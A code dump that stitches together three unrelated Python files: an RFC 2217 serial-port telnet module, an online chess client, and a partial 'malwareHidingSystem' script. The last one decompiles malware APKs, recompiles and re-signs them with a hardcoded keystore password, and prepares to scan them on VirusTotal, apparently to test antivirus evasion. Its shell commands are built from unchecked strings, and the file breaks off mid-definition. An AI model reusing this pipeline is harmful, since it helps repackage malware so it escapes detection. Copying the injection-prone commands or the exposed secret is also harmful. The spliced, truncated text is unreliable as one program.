def _telnetNegotiateOption(self, command, option):
"""Process incoming DO, DONT, WILL, WONT."""
# check our registered telnet options and forward command to them
# they know themselves if they have to answer or not
known = False
for item in self._telnet_options:
# can have more than one match! as some options are duplicated for
# 'us' and 'them'
if item.option == option:
item.process_incoming(command)
known = True
if not known:
# handle unknown options
# only answer to positive requests and deny them
if command == WILL or command == DO:
self.telnetSendOption((command == WILL and DONT or WONT), option)
if self.logger:
self.logger.warning("rejected Telnet option: %r" % (option,))
def _telnetProcessSubnegotiation(self, suboption):
"""Process subnegotiation, the data between IAC SB and IAC SE."""
if suboption[0:1] == COM_PORT_OPTION:
if suboption[1:2] == SERVER_NOTIFY_LINESTATE and len(suboption) >= 3:
self._linestate = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("NOTIFY_LINESTATE: %s" % self._linestate)
elif suboption[1:2] == SERVER_NOTIFY_MODEMSTATE and len(suboption) >= 3:
self._modemstate = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("NOTIFY_MODEMSTATE: %s" % self._modemstate)
# update time when we think that a poll would make sense
self._modemstate_expires = time.time() + 0.3
elif suboption[1:2] == FLOWCONTROL_SUSPEND:
self._remote_suspend_flow = True
elif suboption[1:2] == FLOWCONTROL_RESUME:
self._remote_suspend_flow = False
else:
for item in list(self._rfc2217_options.values()):
if item.ack_option == suboption[1:2]:
#~ print "processing COM_PORT_OPTION: %r" % list(suboption[1:])
item.checkAnswer(bytes(suboption[2:]))
break
else:
if self.logger:
self.logger.warning("ignoring COM_PORT_OPTION: %r" % (suboption,))
else:
if self.logger:
self.logger.warning("ignoring subnegotiation: %r" % (suboption,))
# - outgoing telnet commands and options
def _internal_raw_write(self, data):
"""internal socket write with no data escaping. used to send telnet stuff."""
self._write_lock.acquire()
try:
self._socket.sendall(data)
finally:
self._write_lock.release()
def telnetSendOption(self, action, option):
"""Send DO, DONT, WILL, WONT."""
self._internal_raw_write(to_bytes([IAC, action, option]))
def rfc2217SendSubnegotiation(self, option, value=''):
"""Subnegotiation of RFC2217 parameters."""
value = value.replace(IAC, IAC_DOUBLED)
self._internal_raw_write(to_bytes([IAC, SB, COM_PORT_OPTION, option] + list(value) + [IAC, SE]))
def rfc2217SendPurge(self, value):
item = self._rfc2217_options['purge']
item.set(value) # transmit desired purge type
item.wait(self._network_timeout) # wait for acknowledge from the server
def rfc2217SetControl(self, value):
item = self._rfc2217_options['control']
item.set(value) # transmit desired control type
if self._ignore_set_control_answer:
# answers are ignored when option is set. compatibility mode for
# servers that answer, but not the expected one... (or no answer
# at all) i.e. sredird
time.sleep(0.1) # this helps getting the unit tests passed
else:
item.wait(self._network_timeout) # wait for acknowledge from the server
def rfc2217FlowServerReady(self):
"""\
check if server is ready to receive data. block for some time when
not.
"""
#~ if self._remote_suspend_flow:
#~ wait---
def getModemState(self):
"""\
        Get the last modem state (cached value). If the value is "old", request
        a new one. This cache helps to avoid issuing too many requests when e.g.
        all status lines are queried by the user one after the other (getCTS,
        getDSR, etc.).
"""
# active modem state polling enabled? is the value fresh enough?
if self._poll_modem_state and self._modemstate_expires < time.time():
if self.logger:
self.logger.debug('polling modem state')
# when it is older, request an update
self.rfc2217SendSubnegotiation(NOTIFY_MODEMSTATE)
            timeout_time = time.time() + self._network_timeout
            while time.time() < timeout_time:
                time.sleep(0.05)  # prevent 100% CPU load
                # when the expiration time is updated, it means that a new
                # value has arrived
                if self._modemstate_expires > time.time():
                    break
            else:
                if self.logger:
                    self.logger.warning('poll for modem state failed')
# even when there is a timeout, do not generate an error just
# return the last known value. this way we can support buggy
# servers that do not respond to polls, but send automatic
# updates.
if self._modemstate is not None:
if self.logger:
self.logger.debug('using cached modem state')
return self._modemstate
else:
# never received a notification from the server
raise SerialException("remote sends no NOTIFY_MODEMSTATE")
# assemble Serial class with the platform specific implementation and the base
# for file-like behavior. for Python 2.6 and newer, that provide the new I/O
# library, derive from io.RawIOBase
try:
import io
except ImportError:
# classic version with our own file-like emulation
class Serial(RFC2217Serial, FileLike):
pass
else:
# io library present
class Serial(RFC2217Serial, io.RawIOBase):
pass
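# --- Client usage sketch (host, port number and options are placeholders) ---
# The Serial class assembled above accepts the URL scheme documented at the top
# of this module, so opening a remote port looks roughly like this:
def _demo_open_remote_port():
    s = Serial('rfc2217://localhost:7000/logging=debug', 9600, timeout=3)
    try:
        s.write(b'hello')
        print(s.read(16))
    finally:
        s.close()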
#############################################################################
# The following is code that helps implementing an RFC 2217 server.
class PortManager(object):
"""\
This class manages the state of Telnet and RFC 2217. It needs a serial
instance and a connection to work with. Connection is expected to implement
a (thread safe) write function, that writes the string to the network.
"""
def __init__(self, serial_port, connection, logger=None):
self.serial = serial_port
self.connection = connection
self.logger = logger
self._client_is_rfc2217 = False
# filter state machine
self.mode = M_NORMAL
self.suboption = None
self.telnet_command = None
# states for modem/line control events
self.modemstate_mask = 255
self.last_modemstate = None
self.linstate_mask = 0
# all supported telnet options
self._telnet_options = [
TelnetOption(self, 'ECHO', ECHO, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'we-SGA', SGA, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'they-SGA', SGA, DO, DONT, WILL, WONT, INACTIVE),
TelnetOption(self, 'we-BINARY', BINARY, WILL, WONT, DO, DONT, INACTIVE),
TelnetOption(self, 'they-BINARY', BINARY, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'we-RFC2217', COM_PORT_OPTION, WILL, WONT, DO, DONT, REQUESTED, self._client_ok),
TelnetOption(self, 'they-RFC2217', COM_PORT_OPTION, DO, DONT, WILL, WONT, INACTIVE, self._client_ok),
]
# negotiate Telnet/RFC2217 -> send initial requests
if self.logger:
self.logger.debug("requesting initial Telnet/RFC 2217 options")
for option in self._telnet_options:
if option.state is REQUESTED:
self.telnetSendOption(option.send_yes, option.option)
# issue 1st modem state notification
def _client_ok(self):
"""\
callback of telnet option. It gets called when option is activated.
This one here is used to detect when the client agrees on RFC 2217. A
flag is set so that other functions like check_modem_lines know if the
client is OK.
"""
# The callback is used for we and they so if one party agrees, we're
# already happy. it seems not all servers do the negotiation correctly
# and i guess there are incorrect clients too.. so be happy if client
# answers one or the other positively.
self._client_is_rfc2217 = True
if self.logger:
self.logger.info("client accepts RFC 2217")
# this is to ensure that the client gets a notification, even if there
# was no change
self.check_modem_lines(force_notification=True)
# - outgoing telnet commands and options
def telnetSendOption(self, action, option):
"""Send DO, DONT, WILL, WONT."""
self.connection.write(to_bytes([IAC, action, option]))
def rfc2217SendSubnegotiation(self, option, value=''):
"""Subnegotiation of RFC 2217 parameters."""
value = value.replace(IAC, IAC_DOUBLED)
self.connection.write(to_bytes([IAC, SB, COM_PORT_OPTION, option] + list(value) + [IAC, SE]))
# - check modem lines, needs to be called periodically from user to
# establish polling
def check_modem_lines(self, force_notification=False):
modemstate = (
(self.serial.getCTS() and MODEMSTATE_MASK_CTS) |
(self.serial.getDSR() and MODEMSTATE_MASK_DSR) |
(self.serial.getRI() and MODEMSTATE_MASK_RI) |
(self.serial.getCD() and MODEMSTATE_MASK_CD)
)
# check what has changed
deltas = modemstate ^ (self.last_modemstate or 0) # when last is None -> 0
if deltas & MODEMSTATE_MASK_CTS:
modemstate |= MODEMSTATE_MASK_CTS_CHANGE
if deltas & MODEMSTATE_MASK_DSR:
modemstate |= MODEMSTATE_MASK_DSR_CHANGE
if deltas & MODEMSTATE_MASK_RI:
modemstate |= MODEMSTATE_MASK_RI_CHANGE
if deltas & MODEMSTATE_MASK_CD:
modemstate |= MODEMSTATE_MASK_CD_CHANGE
# if new state is different and the mask allows this change, send
# notification. suppress notifications when client is not rfc2217
if modemstate != self.last_modemstate or force_notification:
if (self._client_is_rfc2217 and (modemstate & self.modemstate_mask)) or force_notification:
self.rfc2217SendSubnegotiation(
SERVER_NOTIFY_MODEMSTATE,
to_bytes([modemstate & self.modemstate_mask])
)
if self.logger:
self.logger.info("NOTIFY_MODEMSTATE: %s" % (modemstate,))
# save last state, but forget about deltas.
# otherwise it would also notify about changing deltas which is
# probably not very useful
self.last_modemstate = modemstate & 0xf0
# - outgoing data escaping
def escape(self, data):
"""\
This generator function is for the user. All outgoing data has to be
properly escaped, so that no IAC character in the data stream messes up
the Telnet state machine in the server.
socket.sendall(escape(data))
"""
for byte in data:
if byte == IAC:
yield IAC
yield IAC
else:
yield byte
# - incoming data filter
def filter(self, data):
"""\
Handle a bunch of incoming bytes. This is a generator. It will yield
all characters not of interest for Telnet/RFC 2217.
The idea is that the reader thread pushes data from the socket through
this filter:
for byte in filter(socket.recv(1024)):
# do things like CR/LF conversion/whatever
# and write data to the serial port
serial.write(byte)
(socket error handling code left as exercise for the reader)
"""
for byte in data:
if self.mode == M_NORMAL:
# interpret as command or as data
if byte == IAC:
self.mode = M_IAC_SEEN
else:
# store data in sub option buffer or pass it to our
# consumer depending on state
if self.suboption is not None:
self.suboption.append(byte)
else:
yield byte
elif self.mode == M_IAC_SEEN:
if byte == IAC:
# interpret as command doubled -> insert character
# itself
if self.suboption is not None:
self.suboption.append(byte)
else:
yield byte
self.mode = M_NORMAL
elif byte == SB:
# sub option start
self.suboption = bytearray()
self.mode = M_NORMAL
elif byte == SE:
# sub option end -> process it now
self._telnetProcessSubnegotiation(bytes(self.suboption))
self.suboption = None
self.mode = M_NORMAL
elif byte in (DO, DONT, WILL, WONT):
# negotiation
self.telnet_command = byte
self.mode = M_NEGOTIATE
else:
# other telnet commands
self._telnetProcessCommand(byte)
self.mode = M_NORMAL
elif self.mode == M_NEGOTIATE: # DO, DONT, WILL, WONT was received, option now following
self._telnetNegotiateOption(self.telnet_command, byte)
self.mode = M_NORMAL
# - incoming telnet commands and options
def _telnetProcessCommand(self, command):
"""Process commands other than DO, DONT, WILL, WONT."""
# Currently none. RFC2217 only uses negotiation and subnegotiation.
if self.logger:
self.logger.warning("ignoring Telnet command: %r" % (command,))
def _telnetNegotiateOption(self, command, option):
"""Process incoming DO, DONT, WILL, WONT."""
# check our registered telnet options and forward command to them
# they know themselves if they have to answer or not
known = False
for item in self._telnet_options:
# can have more than one match! as some options are duplicated for
# 'us' and 'them'
if item.option == option:
item.process_incoming(command)
known = True
if not known:
# handle unknown options
# only answer to positive requests and deny them
if command == WILL or command == DO:
self.telnetSendOption((command == WILL and DONT or WONT), option)
if self.logger:
self.logger.warning("rejected Telnet option: %r" % (option,))
def _telnetProcessSubnegotiation(self, suboption):
"""Process subnegotiation, the data between IAC SB and IAC SE."""
if suboption[0:1] == COM_PORT_OPTION:
if self.logger:
self.logger.debug('received COM_PORT_OPTION: %r' % (suboption,))
if suboption[1:2] == SET_BAUDRATE:
backup = self.serial.baudrate
try:
(baudrate,) = struct.unpack("!I", suboption[2:6])
if baudrate != 0:
self.serial.baudrate = baudrate
except ValueError as e:
if self.logger:
self.logger.error("failed to set baud rate: %s" % (e,))
self.serial.baudrate = backup
else:
if self.logger:
self.logger.info("%s baud rate: %s" % (baudrate and 'set' or 'get', self.serial.baudrate))
self.rfc2217SendSubnegotiation(SERVER_SET_BAUDRATE, struct.pack("!I", self.serial.baudrate))
elif suboption[1:2] == SET_DATASIZE:
backup = self.serial.bytesize
try:
(datasize,) = struct.unpack("!B", suboption[2:3])
if datasize != 0:
self.serial.bytesize = datasize
except ValueError as e:
if self.logger:
self.logger.error("failed to set data size: %s" % (e,))
self.serial.bytesize = backup
else:
if self.logger:
self.logger.info("%s data size: %s" % (datasize and 'set' or 'get', self.serial.bytesize))
self.rfc2217SendSubnegotiation(SERVER_SET_DATASIZE, struct.pack("!B", self.serial.bytesize))
elif suboption[1:2] == SET_PARITY:
backup = self.serial.parity
try:
parity = struct.unpack("!B", suboption[2:3])[0]
if parity != 0:
self.serial.parity = RFC2217_REVERSE_PARITY_MAP[parity]
except ValueError as e:
if self.logger:
self.logger.error("failed to set parity: %s" % (e,))
self.serial.parity = backup
else:
if self.logger:
self.logger.info("%s parity: %s" % (parity and 'set' or 'get', self.serial.parity))
self.rfc2217SendSubnegotiation(
SERVER_SET_PARITY,
struct.pack("!B", RFC2217_PARITY_MAP[self.serial.parity])
)
elif suboption[1:2] == SET_STOPSIZE:
backup = self.serial.stopbits
try:
stopbits = struct.unpack("!B", suboption[2:3])[0]
if stopbits != 0:
self.serial.stopbits = RFC2217_REVERSE_STOPBIT_MAP[stopbits]
except ValueError as e:
if self.logger:
self.logger.error("failed to set stop bits: %s" % (e,))
self.serial.stopbits = backup
else:
if self.logger:
self.logger.info("%s stop bits: %s" % (stopbits and 'set' or 'get', self.serial.stopbits))
self.rfc2217SendSubnegotiation(
SERVER_SET_STOPSIZE,
struct.pack("!B", RFC2217_STOPBIT_MAP[self.serial.stopbits])
)
elif suboption[1:2] == SET_CONTROL:
if suboption[2:3] == SET_CONTROL_REQ_FLOW_SETTING:
if self.serial.xonxoff:
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_SW_FLOW_CONTROL)
elif self.serial.rtscts:
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_HW_FLOW_CONTROL)
else:
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_NO_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_NO_FLOW_CONTROL:
self.serial.xonxoff = False
self.serial.rtscts = False
if self.logger:
self.logger.info("changed flow control to None")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_NO_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_SW_FLOW_CONTROL:
self.serial.xonxoff = True
if self.logger:
self.logger.info("changed flow control to XON/XOFF")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_SW_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_HW_FLOW_CONTROL:
self.serial.rtscts = True
if self.logger:
self.logger.info("changed flow control to RTS/CTS")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_HW_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_REQ_BREAK_STATE:
if self.logger:
self.logger.warning("requested break state - not implemented")
pass # XXX needs cached value
elif suboption[2:3] == SET_CONTROL_BREAK_ON:
self.serial.setBreak(True)
if self.logger:
self.logger.info("changed BREAK to active")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_BREAK_ON)
elif suboption[2:3] == SET_CONTROL_BREAK_OFF:
self.serial.setBreak(False)
if self.logger:
self.logger.info("changed BREAK to inactive")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_BREAK_OFF)
elif suboption[2:3] == SET_CONTROL_REQ_DTR:
if self.logger:
self.logger.warning("requested DTR state - not implemented")
pass # XXX needs cached value
elif suboption[2:3] == SET_CONTROL_DTR_ON:
self.serial.setDTR(True)
if self.logger:
self.logger.info("changed DTR to active")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_DTR_ON)
elif suboption[2:3] == SET_CONTROL_DTR_OFF:
self.serial.setDTR(False)
if self.logger:
self.logger.info("changed DTR to inactive")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_DTR_OFF)
elif suboption[2:3] == SET_CONTROL_REQ_RTS:
if self.logger:
self.logger.warning("requested RTS state - not implemented")
pass # XXX needs cached value
#~ self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_ON)
elif suboption[2:3] == SET_CONTROL_RTS_ON:
self.serial.setRTS(True)
if self.logger:
self.logger.info("changed RTS to active")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_ON)
elif suboption[2:3] == SET_CONTROL_RTS_OFF:
self.serial.setRTS(False)
if self.logger:
self.logger.info("changed RTS to inactive")
self.rfc2217SendSubnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_OFF)
#~ elif suboption[2:3] == SET_CONTROL_REQ_FLOW_SETTING_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_NO_FLOW_CONTROL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_SW_FLOW_CONTOL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_HW_FLOW_CONTOL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_DCD_FLOW_CONTROL:
#~ elif suboption[2:3] == SET_CONTROL_USE_DTR_FLOW_CONTROL:
#~ elif suboption[2:3] == SET_CONTROL_USE_DSR_FLOW_CONTROL:
elif suboption[1:2] == NOTIFY_LINESTATE:
# client polls for current state
self.rfc2217SendSubnegotiation(
SERVER_NOTIFY_LINESTATE,
to_bytes([0]) # sorry, nothing like that implemented
)
elif suboption[1:2] == NOTIFY_MODEMSTATE:
if self.logger:
self.logger.info("request for modem state")
# client polls for current state
self.check_modem_lines(force_notification=True)
elif suboption[1:2] == FLOWCONTROL_SUSPEND:
if self.logger:
self.logger.info("suspend")
self._remote_suspend_flow = True
elif suboption[1:2] == FLOWCONTROL_RESUME:
if self.logger:
self.logger.info("resume")
self._remote_suspend_flow = False
elif suboption[1:2] == SET_LINESTATE_MASK:
self.linstate_mask = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("line state mask: 0x%02x" % (self.linstate_mask,))
elif suboption[1:2] == SET_MODEMSTATE_MASK:
self.modemstate_mask = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("modem state mask: 0x%02x" % (self.modemstate_mask,))
elif suboption[1:2] == PURGE_DATA:
if suboption[2:3] == PURGE_RECEIVE_BUFFER:
self.serial.flushInput()
if self.logger:
self.logger.info("purge in")
self.rfc2217SendSubnegotiation(SERVER_PURGE_DATA, PURGE_RECEIVE_BUFFER)
elif suboption[2:3] == PURGE_TRANSMIT_BUFFER:
self.serial.flushOutput()
if self.logger:
self.logger.info("purge out")
self.rfc2217SendSubnegotiation(SERVER_PURGE_DATA, PURGE_TRANSMIT_BUFFER)
elif suboption[2:3] == PURGE_BOTH_BUFFERS:
self.serial.flushInput()
self.serial.flushOutput()
if self.logger:
self.logger.info("purge both")
self.rfc2217SendSubnegotiation(SERVER_PURGE_DATA, PURGE_BOTH_BUFFERS)
else:
if self.logger:
self.logger.error("undefined PURGE_DATA: %r" % list(suboption[2:]))
else:
if self.logger:
self.logger.error("undefined COM_PORT_OPTION: %r" % list(suboption[1:]))
else:
if self.logger:
self.logger.warning("unknown subnegotiation: %r" % (suboption,))
# simple client test
if __name__ == '__main__':
import sys
s = Serial('rfc2217://localhost:7000', 115200)
sys.stdout.write('%s\n' % s)
#~ s.baudrate = 1898
sys.stdout.write("write...\n")
s.write("hello\n")
s.flush()
sys.stdout.write("read: %s\n" % s.read(5))
#~ s.baudrate = 19200
#~ s.databits = 7
s.close()
|
online_chess.py
|
# coding: UTF-8
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import json
import urllib
import urllib2
import sys
import logging
import threading
from time import sleep, time
from scenes.chess import Chess
from cython.functions import tuple_to_chess_notation, chess_notation_to_tuple
from consts.colors import BLACK, WHITE, next
from consts.urls import (
URL_BASE,
NEW_GAME,
JOIN_GAME,
NEW_MOVE,
WAITING_MOVE_VALIDATION,
VALIDATE_MOVE,
SHOW_MOVE,
NEW_GAME_OVER_REQUEST,
WAITING_GAME_OVER_VALIDATION,
SHOW_GAME_OVER,
SUCCESS,
SUCCESS_CODES
)
from consts.pieces import (
PAWN,
KNIGHT,
BISHOP,
ROOK,
QUEEN,
KING,
)
INVALID_REQUEST = "INVALID REQUEST"
INVALID_TURN = "INVALID TURN"
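# Maps the server's numeric promotion_type codes to the engine's piece
# constants; 5 (PAWN) doubles as the "no promotion" default used elsewhere
# in this module.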
PROMOTION_MAP = {
0: ROOK,
1: KNIGHT,
2: BISHOP,
3: QUEEN,
4: KING,
5: PAWN
}
def html_request(url, method, values={}):
try:
data = urllib.urlencode(values)
request = urllib2.Request(url, data)
request.get_method = lambda: method
result = json.load(urllib2.urlopen(request))
if not result['code'] in SUCCESS_CODES:
raise Exception(INVALID_REQUEST, result['code'], result['message'])
if not result['code'] == 19:
if 'board' in result:
del result['board']
print(time(), result)
return result
except Exception as e:
        logging.exception('URL {0} {1}\n{2}\n{3}'.format(
            method, url, values, str(e)
        ))
raise e
def post(url, values={}):
return html_request(url, 'POST', values)
def get(url, values={}):
return html_request(url, 'GET', values)
class OnlineChess(Chess):
def __init__(self, game, level_white, level_black, id=None, *args, **kwargs):
if level_white != -1:
data = post(URL_BASE + NEW_GAME, {'player_name': 'wgrupo1'})
self.online = BLACK
self.player_key = data['player_key']
self.game_id = data['game_id']
self.player_name = 'wgrupo1'
if level_black != -1:
self.game_id = id
data = post(URL_BASE + JOIN_GAME, {
'player_name': 'bgrupo1',
'game_id': self.game_id,
})
self.online = WHITE
self.player_key = data['player_key']
self.player_name = 'bgrupo1'
self.sent_end_game = False
super(OnlineChess, self).__init__(game, level_white, level_black, *args, **kwargs)
threading.Thread(target=self.wait_end_game_validation).start()
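    # Either validate the move the remote opponent just played (when it is the
    # online side's turn) or publish the local move and poll SHOW_MOVE every
    # few seconds until the server reports whether it is legal.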
def do_move(self, selected, square, promotion=5):
color = self.board.color()
move = self.board.move(selected, square, promotion)
if self.online == color:
data = post(URL_BASE + VALIDATE_MOVE, {
'move_id': self.move_id,
'player_key': self.player_key,
'valid': 'true' if move else 'false'
})
return move
elif move:
move_type = move.type()
param = {
'game_id': self.game_id,
'player_key': self.player_key,
'type': move_type
}
if move_type in [0, 2, 3]:
param['move_from'] = tuple_to_chess_notation(selected)
param['move_to'] = tuple_to_chess_notation(square)
if move_type == 1: #castling
param['rook_from'] = tuple_to_chess_notation(move.rook_from())
param['rook_to'] = tuple_to_chess_notation(move.rook_to())
param['king_from'] = tuple_to_chess_notation(selected)
param['king_to'] = tuple_to_chess_notation(square)
if move_type == 2: #en passant
param['eliminated_pawn'] = tuple_to_chess_notation(
move.get_eliminated_pawn())
if move_type == 3: #promotion
param['promotion_type'] = 3 #queen
data = post(URL_BASE + NEW_MOVE, param)
self.move_id = data['move']['id']
while self.running:
self.do_jit_draw()
data = get(URL_BASE + SHOW_MOVE.format(self.move_id))
if data['move']['validation_time']:
if not data['move']['legal']:
move.undo_update(self.board)
return False
else:
return move
sleep(3)
return False
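    # Poll WAITING_MOVE_VALIDATION every 3 seconds until the remote player's
    # move shows up, then translate its chess notation into board tuples
    # (castling is reported through the king's movement).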
def wait_move_validation(self):
while self.running:
data = get(URL_BASE + WAITING_MOVE_VALIDATION, {
'game_id': self.game_id
})
if 'move' in data:
self.move_id = data['move']['id']
move_type = data['move']['move_type']
move = data['move']['movimentations'][0]
if move_type == 1: #castling
for move in data['move']['movimentations']:
if move['from'] in ['e1', 'e8']:
return (
chess_notation_to_tuple(move['from']),
chess_notation_to_tuple(move['to']),
5
)
elif move_type == 3: #promotion
return (
chess_notation_to_tuple(move['from']),
chess_notation_to_tuple(move['to']),
PROMOTION_MAP[data['move']['promotion_type']]
)
return (
chess_notation_to_tuple(move['from']),
chess_notation_to_tuple(move['to']),
5
)
sleep(3)
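    # Background thread: watch for game-over requests coming from the server
    # and either accept them (win or agreed draw) or reject illegal ones.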
def wait_end_game_validation(self):
while self.running:
            if self.sent_end_game:
                sleep(3)
                continue
data = get(URL_BASE + WAITING_GAME_OVER_VALIDATION, {
'game_id': self.game_id
})
if 'game_over_request' in data:
request = data['game_over_request']
if request['winner'] == self.player_name:
self.end_game(1 if self.online == BLACK else -1)
else:
end = self.verify_status(self.board.status(None))
if not end:
if not request['winner']:
self.sent_end_game = True
self.other_player.confirm_draw()
else:
self.send_illigal_endgame()
def request_draw(self):
self.end_game(0)
def send_illigal_endgame(self):
post(URL_BASE + NEW_GAME_OVER_REQUEST, {
'game_id': self.game_id,
'player_key': self.player_key,
'result': 1
})
def deny_draw(self, player, send=True):
if send:
self.send_illigal_endgame()
Chess.deny_draw(self, player)
self.sent_end_game = False
def end_game(self, state):
self.sent_end_game = True
data = post(URL_BASE + NEW_GAME_OVER_REQUEST, {
'game_id': self.game_id,
'player_key': self.player_key,
'result': state * (1 if self.online == BLACK else -1)
})
self.game_over_request_id = data['game_over_request_id']
if data['code'] == 14:
Chess.end_game(self, state)
while self.running:
data = get(URL_BASE + SHOW_GAME_OVER.format(
self.game_over_request_id
))
if data['game_over_request']['validation_time']:
if data['game_over_request']['legal']:
Chess.end_game(self, state)
#self.sent_end_game = False
else:
self.deny_draw(self.current_player, send=False)
return None
sleep(3)
|
classes.py
|
import os
import time
import string
import random
import requests
import threading
import mysql.connector
from mysql.connector import Error
class Apk:
def __init__(self, name, method):
self.downloadedDir = "/var/www/catchmeifyoucan.tech/malwareHidingSystem/necessaryFiles/apk/"
self.name = name
self.method = method
self.destDir = "/var/www/catchmeifyoucan.tech/malwareHidingSystem/coreSystem/Malware/"
self.createDir = "mkdir " + str(self.destDir) + str(self.name) + "/"
self.morphPath = "/var/www/catchmeifyoucan.tech/html/Morph/"
self.copyFilePath = ""
def copyApk(self):
def doCopy():
os.system(self.createDir)
copyCommand = "cp " + str(self.downloadedDir) + str(self.name) + ".apk" + " " + str(self.destDir) + str(
self.name) + "/" + str(self.name) + ".apk"
os.system(copyCommand)
print("APK COPIED")
p = threading.Thread(target=doCopy)
p.start()
p.join()
return str(self.destDir) + str(self.name) + "/"
def createFile(self):
os.system("mkdir " + str(self.morphPath) + str(self.name))
def copyFileForRecompile(self):
def fileCopyToMorph():
"""self.copyFilePath = "cp -r " + str(self.destDir) + str(self.name) + "/" + str(self.name) + "/ "
self.copyFilePath += str(self.morphPath) + str(self.name) + "/" + str(self.method) + "/"""
print(str(self.copyFilePath))
print(str(self.morphPath))
"""copyPath = self.createDir + self.name + "-" + self.method
print(str(copyPath))
os.system(copyPath)"""
os.system(self.copyFilePath)
print("Burada sorun yok")
p = threading.Thread(target=fileCopyToMorph)
p.start()
p.join()
def copyFileForTransform(self):
def fileCopyToDir():
self.copyFilePath = "cp -r " + str(self.destDir) + str(self.name) + "/" + str(self.name) + "/ "
self.copyFilePath += str(self.destDir) + str(self.name) + "/" + str(self.method) + "/"
print(str(self.copyFilePath))
os.system(self.copyFilePath)
p = threading.Thread(target=fileCopyToDir)
p.start()
p.join()
class Decompiler():
def __init__(self, name, dir):
self.apkName = name
self.apkDir = dir
self.dex2jarDir = "/var/www/catchmeifyoucan.tech/malwareHidingSystem/necessaryFiles/dex2jar-2.0/"
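    # Decode the APK into smali sources with apktool inside a worker thread,
    # then restore the original working directory.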
def apkToSmali(self):
myDir = os.getcwd()
os.chdir(self.apkDir)
def runApkTool():
apkDecodeCommand = "apktool d " + self.apkName + ".apk"
os.system(apkDecodeCommand)
p = threading.Thread(target=runApkTool)
p.start()
p.join()
os.chdir(myDir)
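    # Rename the APK to .zip, unzip it to pull classes.dex into a
    # "<name>-dex2jar" directory, then restore the original .apk file.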
def getDexFromApk(self):
myDir = os.getcwd()
os.chdir(self.apkDir)
def apkToZip():
os.system("mv " + str(self.apkName) + ".apk " + str(self.apkName) + ".zip")
os.system("unzip " + str(self.apkName) + ".zip -d " + str(self.apkName) + "-unzipped")
p = threading.Thread(target=apkToZip)
p.start()
p.join()
os.system("mv " + str(self.apkName) + ".zip " + str(self.apkName) + ".apk")
os.system("mkdir " + str(self.apkName) + "-dex2jar")
os.system("mv " + str(self.apkName) + "-unzipped/classes.dex " + str(self.apkName) + "-dex2jar/classes.dex")
os.system("rm -rf " + str(self.apkName) + "-unzipped")
os.chdir(myDir)
def dex2jar(self):
myDir = os.getcwd()
os.chdir(self.apkDir + str(self.apkName) + "-dex2jar/")
dex2jarCommand = str(self.dex2jarDir) + "d2j-dex2jar.sh classes.dex"
def runDex2Jar():
os.system(dex2jarCommand)
p = threading.Thread(target=runDex2Jar)
p.start()
p.join()
os.chdir(myDir)
class Recompiler():
def __init__(self, apkName, dirName):
self.apkName = apkName
self.apkDir = dirName
def recompileApk(self):
myDir = os.getcwd()
os.chdir(self.apkDir)
def doRecompile():
recompileCommand = "apktool b " + self.apkName
os.system(recompileCommand)
        p = threading.Thread(target=doRecompile)
p.start()
p.join()
os.chdir(myDir)
return self.apkDir + self.apkName + "/dist/"
class Signer():
def __init__(self, apkName, apkDir):
self.aliasName = "catchmeifyoucan"
self.jarSignerLocation = "/usr/lib/jvm/java-11-openjdk-amd64/bin/"
self.jarSignerCommand = "jarsigner -storepass vfLax2TwF9YW -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore "
self.keyStoreDir = "/var/www/catchmeifyoucan.tech/malwareHidingSystem/necessaryFiles/keyStore/key.keystore "
self.apkName = apkName
self.apkDir = apkDir
self.jarSignerCommand += str(self.keyStoreDir) + " " + str(self.apkName) + ".apk " + str(self.aliasName)
self.zipalignCommand = "/usr/lib/android-sdk/build-tools/debian/zipalign -v 4 " + str(
self.apkName) + ".apk out.apk"
# print(self.zipalignCommand)
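    # Re-sign the rebuilt APK with jarsigner using the project keystore, then
    # zipalign it and replace the original file with the aligned output.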
def signApk(self):
myDir = os.getcwd()
os.chdir(self.apkDir)
# print(str(self.jarSignerLocation) + self.jarSignerCommand)
def doSign():
resignCommand = str(self.jarSignerLocation) + self.jarSignerCommand
os.system(resignCommand)
p = threading.Thread(target=doSign)
p.start()
p.join()
def doZipalign():
os.system(self.zipalignCommand)
p1 = threading.Thread(target=doZipalign)
p1.start()
p1.join()
os.system("rm -rf " + str(self.apkName) + ".apk")
os.system("mv out.apk " + str(self.apkName) + ".apk")
os.chdir(myDir)
class Tester():
def __init__(self, name, dir):
self.apkName = name + ".apk"
self.apkDir = dir
self.url = "https://www.virustotal.com/vtapi/v2/file/"
self.scanUrl = self.url + "scan"
self.reportUrl = self.url + "report"
self.apiPool = {
}
self.report = {
